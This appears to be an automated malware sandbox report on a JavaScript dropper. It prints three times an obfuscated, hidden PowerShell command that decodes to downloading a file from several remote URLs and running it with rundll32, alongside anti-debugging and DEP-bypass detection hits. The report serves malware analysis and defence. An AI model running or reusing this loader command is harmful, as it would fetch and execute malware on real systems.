Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 17, 2023, 9:14 a.m. | May 17, 2023, 9:16 a.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Lozrnlwd.js" Briguer RipenersCerebella BetaxedBeblooded
2188-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAB0AGgAZQBpAG4AZQAgAD0AIAA3ADEAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADgAOwAkAEYAZQBhAHoAZQBkAEcAaQB0AG8AeABpAGcAZQBuAGkAbgAgAD0AIAAiAFMAeQBtAGIAbwBsAGkAcwBhAHQAaQBvAG4AUgBlAHMAdAByAGUAbgBnAHQAaABlAG4AZQBkACIAOwAkAG0AaQBjAHIAYQBtAG8AYwBrAFMAdQBwAGUAcgBpAG4AZABpAHYAaQBkAHUAYQBsAGkAcwB0ACAAPQAgACIAUgBlAHMAdQBsAHQAbABlAHMAcwBsAHkATwB0AHQAbwBtAGEAbgBlAGEAbgAiADsAJABjAGEAdABlAGcAbwByAGkAcwBpAG4AZwBNAG8AaABhAG0AbQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBPAEEAQQAzAEEAQwA4AEEAVgBnAEEAeQBBAEUATQBBAE4AdwBBAHYAQQBFAEkAQQBlAGcAQgB4AEEARQBVAEEATgBBAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABrAEEATQBnAEEAdgBBAEcAdwBBAGUAZwBCAFMAQQBDADgAQQBPAEEAQgBzAEEASABRAEEAUgBRAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQB4AEEARABRAEEATAB3AEIAMQBBAEcAVQBBAGQAdwBCAG8AQQBFAGMAQQBMAHcAQgBSAEEARwBFAEEAVQBnAEIAUQBBAEcAMABBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHcAYQBtAGIAbABlAGQAIABpAG4AIAAkAGMAYQB0AGUAZwBvAHIAaQBzAGkAbgBnAE0AbwBoAGEAbQBtAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBTAGYAIgApACAAewAkAGEAZgB0AGUAcgB3AHIAaQBzAHQAQgB5AHAAbABhAGMAZQAgAD0AIAAzADMANQA7ACQAUwB1AGIAdgBpAHQAcgBlAG8AdQBzAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBADMAQQBEAEUAQQBMAGcAQQB5AEEARABVAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBAHcAQQBBAD0APQBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAUQBBAFkAUQBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBRAEIAagBBAEUAMABBAFkAUQBCAGoAQQBHAHMAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAegBBAEcAZwBBAFoAUQBCAHoAQQBDADQAQQBiAEEAQgBwAEEAQQA9AD0AQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATwBBAEEAdQBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQB5AEEARABZAEEAIgA7AHQAcgB5ACAAewAkAG0AbwBuAHQAcgBlAGEAbAAgAD0AIAAyADYANQA7ACQAZgByAGkAZwBoAHQAZQBuAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AGEAbQBiAGwAZQBkACkAKQA7AGkAdwByACAAJABmAHIAaQBnAGgAdABlAG4AZQByACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAOwAkAGcAcgBhAHAAZQB5AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABVAEEATQB3AEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AVgBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE4AZwBBAHUAQQBEAEkAQQBOAFEAQQB4AEEAQwA0AEEATQBRAEEAMABBAEQATQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYAMgAyADIAMQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAdwBBAEgASQBBAFkAUQBCADMAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAZABBAEEAdQBBAEcAUQBBAFoAUQBCAG0AQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYQBRAEIANgBBAEcAVQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIAVwBBAEgAVQBBAFoAUQBCAEsAQQBGAE0AQQAiADsAJABQAG8AbAB5AHAAaQBkAG8AbQBBAGIAbwByAHQAaQB2AGUAbgBlAHMAcwAgAD0AIAAiAGMAZQBwAGgAYQBsAG8AdAByAGEAYwB0AG8AcgBJAHIAaQBzAHIAbwBvAHQAIgA7ACQAYgBhAHIAYgBlAHIAaQBuAGcARABlAGMAawBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBiAGcAQgBsAEEARwAwAEEAWgBRAEIATgBBAEcAVQBBAGIAQQBCAHYAQQBHAFEAQQBhAFEAQgB6AEEASABRAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHUAQQBHAFUAQQBlAFEAQQA9ACIAOwBiAHIAZQBhAGsAOwBWAHUAZQBKAFMAOwB9AFYAdQBlAEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAZQB4AHAAaQBhAHQAZQBzACAAPQAgADUAMwA1ADsAJABMAGUAdQBjAG8AYwB5AHQAbwBwAGUAbgBpAGMATwB3AGUAbgBpAGEAIAA9ACAAOQA2ADUAOwB9AH0AJABkAGkAcwBlAG4AZgByAGEAbgBjAGgAaQBzAGkAbgBnAFMAeQBtAGIAbwBsAGkAegBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBIAEkAQQBkAFEAQgBqAEEARwBrAEEAYwB3AEIATgBBAEgAVQBBAFoAQQBCAGkAQQBHAEUAQQBiAGcAQgByAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AbABPAHMAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQBsAE8AcwBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAZwBCAHYAQQBIAEEAQQBkAFEAQgBpAEEARwB3AEEAYQBRAEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQB1AEEARwB3AEEAYgB3AEIAMgBBAEcAVQBBAGwATwBzAGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBNAFEAQQB5AEEARABjAEEATABnAEEAeABBAEQASQBBAE0AQQBBAD0AIgA7AA=="
2404
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAB0AGgAZQBpAG4AZQAgAD0AIAA3ADEAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADgAOwAkAEYAZQBhAHoAZQBkAEcAaQB0AG8AeABpAGcAZQBuAGkAbgAgAD0AIAAiAFMAeQBtAGIAbwBsAGkAcwBhAHQAaQBvAG4AUgBlAHMAdAByAGUAbgBnAHQAaABlAG4AZQBkACIAOwAkAG0AaQBjAHIAYQBtAG8AYwBrAFMAdQBwAGUAcgBpAG4AZABpAHYAaQBkAHUAYQBsAGkAcwB0ACAAPQAgACIAUgBlAHMAdQBsAHQAbABlAHMAcwBsAHkATwB0AHQAbwBtAGEAbgBlAGEAbgAiADsAJABjAGEAdABlAGcAbwByAGkAcwBpAG4AZwBNAG8AaABhAG0AbQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBPAEEAQQAzAEEAQwA4AEEAVgBnAEEAeQBBAEUATQBBAE4AdwBBAHYAQQBFAEkAQQBlAGcAQgB4AEEARQBVAEEATgBBAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABrAEEATQBnAEEAdgBBAEcAdwBBAGUAZwBCAFMAQQBDADgAQQBPAEEAQgBzAEEASABRAEEAUgBRAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQB4AEEARABRAEEATAB3AEIAMQBBAEcAVQBBAGQAdwBCAG8AQQBFAGMAQQBMAHcAQgBSAEEARwBFAEEAVQBnAEIAUQBBAEcAMABBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHcAYQBtAGIAbABlAGQAIABpAG4AIAAkAGMAYQB0AGUAZwBvAHIAaQBzAGkAbgBnAE0AbwBoAGEAbQBtAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBTAGYAIgApACAAewAkAGEAZgB0AGUAcgB3AHIAaQBzAHQAQgB5AHAAbABhAGMAZQAgAD0AIAAzADMANQA7ACQAUwB1AGIAdgBpAHQAcgBlAG8AdQBzAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBADMAQQBEAEUAQQBMAGcAQQB5AEEARABVAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBAHcAQQBBAD0APQBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAUQBBAFkAUQBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBRAEIAagBBAEUAMABBAFkAUQBCAGoAQQBHAHMAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAegBBAEcAZwBBAFoAUQBCAHoAQQBDADQAQQBiAEEAQgBwAEEAQQA9AD0AQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATwBBAEEAdQBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQB5AEEARABZAEEAIgA7AHQAcgB5ACAAewAkAG0AbwBuAHQAcgBlAGEAbAAgAD0AIAAyADYANQA7ACQAZgByAGkAZwBoAHQAZQBuAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AGEAbQBiAGwAZQBkACkAKQA7AGkAdwByACAAJABmAHIAaQBnAGgAdABlAG4AZQByACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAOwAkAGcAcgBhAHAAZQB5AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABVAEEATQB3AEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AVgBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE4AZwBBAHUAQQBEAEkAQQBOAFEAQQB4AEEAQwA0AEEATQBRAEEAMABBAEQATQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYAMgAyADIAMQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAdwBBAEgASQBBAFkAUQBCADMAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAZABBAEEAdQBBAEcAUQBBAFoAUQBCAG0AQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYQBRAEIANgBBAEcAVQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIAVwBBAEgAVQBBAFoAUQBCAEsAQQBGAE0AQQAiADsAJABQAG8AbAB5AHAAaQBkAG8AbQBBAGIAbwByAHQAaQB2AGUAbgBlAHMAcwAgAD0AIAAiAGMAZQBwAGgAYQBsAG8AdAByAGEAYwB0AG8AcgBJAHIAaQBzAHIAbwBvAHQAIgA7ACQAYgBhAHIAYgBlAHIAaQBuAGcARABlAGMAawBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBiAGcAQgBsAEEARwAwAEEAWgBRAEIATgBBAEcAVQBBAGIAQQBCAHYAQQBHAFEAQQBhAFEAQgB6AEEASABRAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHUAQQBHAFUAQQBlAFEAQQA9ACIAOwBiAHIAZQBhAGsAOwBWAHUAZQBKAFMAOwB9AFYAdQBlAEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAZQB4AHAAaQBhAHQAZQBzACAAPQAgADUAMwA1ADsAJABMAGUAdQBjAG8AYwB5AHQAbwBwAGUAbgBpAGMATwB3AGUAbgBpAGEAIAA9ACAAOQA2ADUAOwB9AH0AJABkAGkAcwBlAG4AZgByAGEAbgBjAGgAaQBzAGkAbgBnAFMAeQBtAGIAbwBsAGkAegBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBIAEkAQQBkAFEAQgBqAEEARwBrAEEAYwB3AEIATgBBAEgAVQBBAFoAQQBCAGkAQQBHAEUAQQBiAGcAQgByAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AbABPAHMAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQBsAE8AcwBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAZwBCAHYAQQBIAEEAQQBkAFEAQgBpAEEARwB3AEEAYQBRAEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQB1AEEARwB3AEEAYgB3AEIAMgBBAEcAVQBBAGwATwBzAGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBNAFEAQQB5AEEARABjAEEATABnAEEAeABBAEQASQBBAE0AQQBBAD0AIgA7AA==" |
cmdline | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAB0AGgAZQBpAG4AZQAgAD0AIAA3ADEAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADgAOwAkAEYAZQBhAHoAZQBkAEcAaQB0AG8AeABpAGcAZQBuAGkAbgAgAD0AIAAiAFMAeQBtAGIAbwBsAGkAcwBhAHQAaQBvAG4AUgBlAHMAdAByAGUAbgBnAHQAaABlAG4AZQBkACIAOwAkAG0AaQBjAHIAYQBtAG8AYwBrAFMAdQBwAGUAcgBpAG4AZABpAHYAaQBkAHUAYQBsAGkAcwB0ACAAPQAgACIAUgBlAHMAdQBsAHQAbABlAHMAcwBsAHkATwB0AHQAbwBtAGEAbgBlAGEAbgAiADsAJABjAGEAdABlAGcAbwByAGkAcwBpAG4AZwBNAG8AaABhAG0AbQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBPAEEAQQAzAEEAQwA4AEEAVgBnAEEAeQBBAEUATQBBAE4AdwBBAHYAQQBFAEkAQQBlAGcAQgB4AEEARQBVAEEATgBBAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABrAEEATQBnAEEAdgBBAEcAdwBBAGUAZwBCAFMAQQBDADgAQQBPAEEAQgBzAEEASABRAEEAUgBRAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQB4AEEARABRAEEATAB3AEIAMQBBAEcAVQBBAGQAdwBCAG8AQQBFAGMAQQBMAHcAQgBSAEEARwBFAEEAVQBnAEIAUQBBAEcAMABBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHcAYQBtAGIAbABlAGQAIABpAG4AIAAkAGMAYQB0AGUAZwBvAHIAaQBzAGkAbgBnAE0AbwBoAGEAbQBtAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBTAGYAIgApACAAewAkAGEAZgB0AGUAcgB3AHIAaQBzAHQAQgB5AHAAbABhAGMAZQAgAD0AIAAzADMANQA7ACQAUwB1AGIAdgBpAHQAcgBlAG8AdQBzAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBADMAQQBEAEUAQQBMAGcAQQB5AEEARABVAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBAHcAQQBBAD0APQBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAUQBBAFkAUQBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBRAEIAagBBAEUAMABBAFkAUQBCAGoAQQBHAHMAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAegBBAEcAZwBBAFoAUQBCAHoAQQBDADQAQQBiAEEAQgBwAEEAQQA9AD0AQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATwBBAEEAdQBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQB5AEEARABZAEEAIgA7AHQAcgB5ACAAewAkAG0AbwBuAHQAcgBlAGEAbAAgAD0AIAAyADYANQA7ACQAZgByAGkAZwBoAHQAZQBuAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AGEAbQBiAGwAZQBkACkAKQA7AGkAdwByACAAJABmAHIAaQBnAGgAdABlAG4AZQByACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAOwAkAGcAcgBhAHAAZQB5AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABVAEEATQB3AEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AVgBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE4AZwBBAHUAQQBEAEkAQQBOAFEAQQB4AEEAQwA0AEEATQBRAEEAMABBAEQATQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYAMgAyADIAMQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAdwBBAEgASQBBAFkAUQBCADMAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAZABBAEEAdQBBAEcAUQBBAFoAUQBCAG0AQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYQBRAEIANgBBAEcAVQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIAVwBBAEgAVQBBAFoAUQBCAEsAQQBGAE0AQQAiADsAJABQAG8AbAB5AHAAaQBkAG8AbQBBAGIAbwByAHQAaQB2AGUAbgBlAHMAcwAgAD0AIAAiAGMAZQBwAGgAYQBsAG8AdAByAGEAYwB0AG8AcgBJAHIAaQBzAHIAbwBvAHQAIgA7ACQAYgBhAHIAYgBlAHIAaQBuAGcARABlAGMAawBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBiAGcAQgBsAEEARwAwAEEAWgBRAEIATgBBAEcAVQBBAGIAQQBCAHYAQQBHAFEAQQBhAFEAQgB6AEEASABRAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHUAQQBHAFUAQQBlAFEAQQA9ACIAOwBiAHIAZQBhAGsAOwBWAHUAZQBKAFMAOwB9AFYAdQBlAEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAZQB4AHAAaQBhAHQAZQBzACAAPQAgADUAMwA1ADsAJABMAGUAdQBjAG8AYwB5AHQAbwBwAGUAbgBpAGMATwB3AGUAbgBpAGEAIAA9ACAAOQA2ADUAOwB9AH0AJABkAGkAcwBlAG4AZgByAGEAbgBjAGgAaQBzAGkAbgBnAFMAeQBtAGIAbwBsAGkAegBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBIAEkAQQBkAFEAQgBqAEEARwBrAEEAYwB3AEIATgBBAEgAVQBBAFoAQQBCAGkAQQBHAEUAQQBiAGcAQgByAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AbABPAHMAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQBsAE8AcwBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAZwBCAHYAQQBIAEEAQQBkAFEAQgBpAEEARwB3AEEAYQBRAEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQB1AEEARwB3AEEAYgB3AEIAMgBBAEcAVQBBAGwATwBzAGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBNAFEAQQB5AEEARABjAEEATABnAEEAeABBAEQASQBBAE0AQQBBAD0AIgA7AA==" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
